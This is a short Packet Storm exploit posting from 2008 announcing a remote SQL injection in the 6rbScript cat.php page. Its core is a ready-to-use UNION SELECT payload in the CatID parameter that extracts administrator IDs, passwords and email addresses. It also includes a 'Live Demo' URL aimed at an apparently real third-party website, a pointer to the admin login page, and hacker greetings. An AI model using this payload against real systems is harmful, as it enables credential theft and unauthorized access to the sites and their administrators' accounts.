6rbscriptcat-sql.txt

2008-09-22T00:00:00
ID PACKETSTORM:70218
Type packetstorm
Reporter Karar alShaMi
Modified 2008-09-22T00:00:00

Description

                                        
                                            `$___________________________________________________/  
$  
$ 6rbScript (cat.php) Remote SQL Injection  
$  
$___________________________________________________/  
$ -- K --  
$  
$ Author:\ Karar_alshami   
$  
$ Home:\ Google.Com  
$  
$ email:\ Karar_alshame{aT}Yahoo{d0t}com  
$  
$  
$  
$___________________________________________________/  
$ -- K --  
$  
$ script :\ www.6rbscript.com  
$   
$ Price! :\ 150$  
$  
$ DorK :\ "Try 2 Find it!"  
$___________________________________________________/  
  
  
Exploit:\  
------------  
  
WwW..[localhost].com/script/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors--  
  
  
Live Demo:\  
-----------------  
  
http://www.qatarw.com/A/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors--  
  
  
Admin LoGin :\  
--------------------  
  
WwW.[localhost].com/admin  
  
  
  
  
  
____________________________-- Greetz --_________________________________/  
$  
$ All members 0f Mriraq.com/vb & www.iq-ty.com/vb   
$  
$ All my frienDs & $ Hussin X $ S_DLA_S Th3 1r4Q1 $ GeNiUs IrAQI $ Fakar ali $   
$   
$ Bashar $ Iraqhack $ mos_chori  
$   
$ h3 h3  
$______________________________----____________________________________/  
  
  
`